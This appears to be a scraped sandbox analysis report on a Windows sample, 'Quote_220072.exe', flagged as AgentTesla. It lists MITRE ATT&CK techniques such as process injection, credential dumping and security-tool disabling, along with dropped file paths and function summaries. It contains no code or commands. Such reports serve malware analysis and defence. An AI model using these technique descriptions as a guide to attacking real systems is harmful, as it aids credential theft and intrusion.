Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quote_220072.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll

C:\Users\user\Music\antithetic.ini

C:\Users\user\overlays\besvangredes\Emmens.udk

C:\Users\user\overlays\besvangredes\Hognoses.Sne

C:\Users\user\overlays\besvangredes\Proprietrer.bet

C:\Users\user\overlays\besvangredes\Trikstanks.pra

C:\Users\user\overlays\besvangredes\boyaus.rom

C:\Users\user\overlays\besvangredes\gear.dra

C:\Users\user\overlays\besvangredes\jagtfalk.ill

C:\Users\user\overlays\besvangredes\regill.ful

C:\Users\user\overlays\besvangredes\sortlistningens.txt

C:\Users\user\overlays\besvangredes\superacutely.Chr75

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Quote_220072.exe

Function 004036DA Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 416
stringfilecomCOMMON

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Function 004033CB Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 178
memoryCOMMON

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre